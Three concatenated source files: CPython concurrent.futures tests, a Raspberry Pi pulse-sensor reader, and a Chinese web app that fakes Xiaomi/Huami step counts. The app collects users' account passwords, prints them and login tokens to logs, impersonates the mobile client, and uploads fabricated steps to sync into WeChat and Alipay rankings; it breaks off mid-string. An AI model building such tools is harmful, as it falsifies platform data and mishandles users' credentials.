# followed by what looks like a thread number.
self.assertRegex(t.name, r'^.*ThreadPoolExecutor.*_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
pulsesensor.py | # extended from https://github.com/WorldFamousElectronics/PulseSensor_Amped_Arduino
import time
import threading
from MCP3008 import MCP3008
class Pulsesensor:
def __init__(self, channel = 0, bus = 0, device = 0):
self.channel = channel
self.BPM = 0
self.adc = MCP3008(bus, device)
def getBPMLoop(self):
# init variables
rate = [0] * 10 # array to hold last 10 IBI values
sampleCounter = 0 # used to determine pulse timing
lastBeatTime = 0 # used to find IBI
P = 512 # used to find peak in pulse wave, seeded
T = 512 # used to find trough in pulse wave, seeded
thresh = 525 # used to find instant moment of heart beat, seeded
amp = 100 # used to hold amplitude of pulse waveform, seeded
firstBeat = True # used to seed rate array so we startup with reasonable BPM
secondBeat = False # used to seed rate array so we startup with reasonable BPM
IBI = 600 # int that holds the time interval between beats! Must be seeded!
Pulse = False # "True" when User's live heartbeat is detected. "False" when not a "live beat".
lastTime = int(time.time()*1000)
while not self.thread.stopped:
Signal = self.adc.read(self.channel)
#print("raw data", Signal)
currentTime = int(time.time()*1000)
sampleCounter += currentTime - lastTime
lastTime = currentTime
N = sampleCounter - lastBeatTime
# find the peak and trough of the pulse wave
if Signal < thresh and N > (IBI/5.0)*3: # avoid dichrotic noise by waiting 3/5 of last IBI
if Signal < T: # T is the trough
T = Signal # keep track of lowest point in pulse wave
if Signal > thresh and Signal > P:
P = Signal
# signal surges up in value every time there is a pulse
if N > 250: # avoid high frequency noise
if Signal > thresh and Pulse == False and N > (IBI/5.0)*3:
Pulse = True # set the Pulse flag when we think there is a pulse
IBI = sampleCounter - lastBeatTime # measure time between beats in mS
lastBeatTime = sampleCounter # keep track of time for next pulse
if secondBeat: # if this is the second beat, if secondBeat == TRUE
secondBeat = False; # clear secondBeat flag
for i in range(len(rate)): # seed the running total to get a realisitic BPM at startup
rate[i] = IBI
if firstBeat: # if it's the first time we found a beat, if firstBeat == TRUE
firstBeat = False; # clear firstBeat flag
secondBeat = True; # set the second beat flag
continue
# keep a running total of the last 10 IBI values
rate[:-1] = rate[1:] # shift data in the rate array
rate[-1] = IBI # add the latest IBI to the rate array
runningTotal = sum(rate) # add upp oldest IBI values
runningTotal /= len(rate) # average the IBI values
self.BPM = 60000/runningTotal # how many beats can fit into a minute? that's BPM!
if Signal < thresh and Pulse == True: # when the values are going down, the beat is over
Pulse = False # reset the Pulse flag so we can do it again
amp = P - T # get amplitude of the pulse wave
thresh = amp/2 + T # set thresh at 50% of the amplitude
P = thresh # reset these for next time
T = thresh
if N > 2500: # if 2.5 seconds go by without a beat
thresh = 512 # set thresh default
P = 512 # set P default
T = 512 # set T default
lastBeatTime = sampleCounter # bring the lastBeatTime up to date
firstBeat = True # set these to avoid noise
secondBeat = False # when we get the heartbeat back
self.BPM = 0
time.sleep(0.005)
# Start getBPMLoop routine which saves the BPM in its variable
def startAsyncBPM(self):
self.thread = threading.Thread(target=self.getBPMLoop)
self.thread.stopped = False
self.thread.start()
return
# Stop the routine
def stopAsyncBPM(self):
self.thread.stopped = True
self.BPM = 0
return
|
manual.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# author:acloudtwei
# FileName:weisport-manual
# createdate:2022/02/23
# SoftWare: PyCharm
import weipyweb
from weipyweb.input import *
from weipyweb.output import *
import requests, time, re, random
import redis
from apscheduler.schedulers.blocking import BlockingScheduler
import tornado.web
import tornado.ioloop
from weipyweb.platform.tornado import webio_handler
import threading
pool = redis.ConnectionPool(host='redis', port=6379, decode_responses=True)
r = redis.Redis(host='redis', port=6379, decode_responses=True)
# 这里填写https://www.pushplus.plus/推送网站的token(粉丝刷步数推送)
Push_Token = "填写你的token"
def xiaomihelp():
STATIC_PATH = "./img"
put_html("<h1 style='color:skyblue'>运动刷步数助手小米教程</h1>").style("text-align:center")
put_html("<h2 style='color:red'>运动刷步数助手小米账号密码登录</h2>").style("text-align:center")
put_html("<h3 style='color:#FF8C00'>1.从应用商店下载小米运动App,打开软件并选择没有账号立即注册。</h3>").style("text-align:center")
img1 = open(STATIC_PATH + '/1.png', 'rb').read()
put_image(img1, width="70%").style("display:block").style("margin:0 auto")
put_html("<h3 style='color:#FF8C00'>2.登录之后,点击我的->第三方接入->绑定你想同步数据的账号。</h3>").style("text-align:center")
put_html("<p style='color:gray;font-size:13px'>(<span style='color:red'>VX</span>没有刷上就取消共享取消公众号关注重新绑定)</p>").style(
"text-align:center")
put_html("<p style='color:gray;font-size:13px'>(<span style='color:red'>ZFB</span>没有刷上就解绑重新绑定)</p>").style(
"text-align:center")
put_html("<p style='color:gray;font-size:13px'>(小米运动暂时不支持QQ排行榜同步)</p>").style("text-align:center")
img2 = open(STATIC_PATH + '/2.png', 'rb').read()
put_image(img2, width="70%").style("display:block").style("margin:0 auto")
put_html("<h3 style='color:#FF8C00'>3.回到运动刷步数助手网站,直接输入你的账号密码以及需要刷的步数,然后提交步数。</h3>").style(
"text-align:center")
img3 = open(STATIC_PATH + '/3.jpg', 'rb').read()
put_image(img3, width="70%").style("display:block").style("margin:0 auto")
put_html("<h1 style='color:#DC143C'>----------分割线----------</h1>").style("text-align:center")
put_html("<h3 style='color:#DC143C'>PS:密码明明对的但运动助手提示小米运动密码错误解决方法</h3>").style("text-align:center")
put_html("<h3 style='color:#FF8C00'>1.我的-设置-退出登录退出。(小米运动APP)</h3>").style("text-align:center")
img4 = open(STATIC_PATH + '/4.png', 'rb').read()
put_image(img4, width="70%").style("display:block").style("margin:0 auto")
put_html("<h3 style='color:#FF8C00'>2.退出到APP首页,忘记密码-输入手机号和短信验证码-输入新密码(修改密码),设置你自己记得住的密码。</h3>").style(
"text-align:center")
img5 = open(STATIC_PATH + '/5.png', 'rb').read()
put_image(img5, width="70%").style("display:block").style("margin:0 auto")
put_html("<h3 style='color:#FF8C00'>3.修改密码成功以后,返回运动刷步数助手再次尝试刷步。</h3>").style(
"text-align:center")
put_html("<h1 style='color:#0000FF'>----------分割线----------</h1>").style("text-align:center")
put_html("<h2 style='color:red'>所有问题解答:</h2>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:为什么我提交了微信却显示0步?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:没有关联成功、或者微信运动被封。</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:用修改步数会封号吗?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:不会 如果刷的步数过多会封微信运动 等7天后解封就好了</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:为什么我滑块验证码提交了却提示成功?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:代理问题,多提交几次就好了。</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:为什么我支付宝同步成功了,微信却是0步?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:微信没有关联成功、或者微信运动被封。</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:微信运动被封了怎么办?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:解绑微信,关闭微信运动,等7天自动解封。</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:为什么QQ不同步步数?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:QQ有延迟,过一会再看不行的话多提交几次。</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>问:为什么我QQ扫码被冻结了?</h4>").style("text-align:center")
put_html("<h4 style='color:#00CED1'>答:服务器在成都所以会异地登录导致QQ被冻结 改密码就好了。</h4>").style("text-align:center")
put_link("点击返回", url="/").style("display:flex").style("justify-content:center").style("align-item:center").style(
"color:skyblue")
def mi(): # 这里可以获取请求过来的是数据
def judge_phone(tel):
tel = str(tel)
ret = re.match(r"^1[35789]\d{9}$", tel)
if ret is None:
return "你输入的账号有误,请输入小米运动的账号(手机号)!"
def no_empty_str(num):
if len(num) == 0:
return "请不要输入空数据!"
def no_empty_num(num):
if num < 0:
return "输入负数你想干嘛呢你!?"
elif num > 90000:
return "刷这么多我怕你会封号!!!"
put_link("不会用?点这里", url="/help", new_window=True).style("color:red")
info = input_group("运动刷步数助手(小米运动版)", [
input('小米运动账号:', name='phones', type=NUMBER, validate=judge_phone, placeholder="请输入账号(手机号)!"),
input('小米运动密码:', name='psws', type=PASSWORD, placeholder="请输入密码!", validate=no_empty_str),
input('修改的步数:', name='steps', type=NUMBER, placeholder="请输入要修改的步数!", validate=no_empty_num),
])
print(info['phones'], info['psws'], info['steps'])
phones = info['phones']
psws = info['psws']
steps = info['steps']
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
headers = {
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; MI 6 MIUI/20.6.18)'
}
# 获取登录code
def get_code(location):
code_pattern = re.compile("(?<=access=).*?(?=&)")
code = code_pattern.findall(location)[0]
return code
# 登录
def login(user, password):
url1 = "https://api-user.huami.com/registrations/+86" + user + "/tokens"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "MiFit/4.6.0 (iPhone; iOS 14.0.1; Scale/2.00)"
}
data1 = {
"client_id": "HuaMi",
"password": f"{password}",
"redirect_uri": "https://s3-us-west-2.amazonaws.com/hm-registration/successsignin.html",
"token": "access"
}
r1 = requests.post(url1, data=data1, headers=headers, allow_redirects=False)
try:
location = r1.headers["Location"]
code = get_code(location)
except:
return 0, 0
# print("access_code获取成功!")
# print(code)
url2 = "https://account.huami.com/v2/client/login"
data2 = {
"app_name": "com.xiaomi.hm.health",
"app_version": "4.6.0",
"code": f"{code}",
"country_code": "CN",
"device_id": "2C8B4939-0CCD-4E94-8CBA-CB8EA6E613A1",
"device_model": "phone",
"grant_type": "access_token",
"third_name": "huami_phone",
}
r2 = requests.post(url2, data=data2, headers=headers).json()
login_token = r2["token_info"]["login_token"]
print("login_token获取成功!")
print(login_token)
userid = r2["token_info"]["user_id"]
print("userid获取成功!")
print(userid)
return login_token, userid
# 主函数
def main(user, passwd, step):
user = str(user)
password = str(passwd)
step = str(step)
if user == '' or password == '':
print("User name or password cannot be empty!")
return "用户名或密码不能为空!"
if step == '':
print("已设置为随机步数(24000-25000)")
step = str(random.randint(24000, 25000))
login_token = 0
login_token, userid = login(user, password)
if login_token == 0:
print("Login failed, account number or password is wrong!")
return "登陆失败,账号或密码错误!(请重新刷新网页)"
t = get_time()
app_token = get_app_token(login_token)
today = time.strftime("%F")
data_json = '%5B%7B%22data_hr%22%3A%22%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FVv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0v%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0n%5C%2Fa%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1FK%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9PTFFpaf9L%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FR%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0j%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9K%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzf%5C%2F%5C%2F%5C%2F86%5C%2Fzr%5C%2FOv88%5C%2Fzf%5C%2FPf%5C%2F%5C%2F%5C%2F0v%5C%2FS%5C%2F8%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FSf%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fz3%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0r%5C%2FOv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F9L%5C%2Fzb%5C%2FSf9K%5C%2F0v%5C%2FRf9H%5C%2Fzj%5C%2FSf9K%5C%2F0%5C%2F%5C%2FN%5C%2F%5C%2F%5C%2F%5C%2F0D%5C%2FSf83%5C%2Fzr%5C%2FPf9M%5C%2F0v%5C%2FOv9e%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FS%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fzv%5C%2F%5C%2Fz7%5C%2FO%5C%2F83%5C%2Fzv%5C%2FN%5C%2F83%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fz%5C%2F%5C%2FNv83%5C%2Fzn%5C%2FXv84%5C%2Fzr%5C%2FPP84%5C%2Fzj%5C%2FN%5C%2F9e%5C%2Fzr%5C%2FN%5C%2F89%5C%2F03%5C%2FP%5C%2F89%5C%2Fz3%5C%2FQ%5C%2F9N%5C%2F0v%5C%2FTv9C%5C%2F0H%5C%2FOf9D%5C%2Fzz%5C%2FOf88%5C%2Fz%5C%2F%5C%2FPP9A%5C%2Fzr%5C%2FN%5C%2F86%5C%2Fzz%5C%2FNv87%5C%2F0D%5C%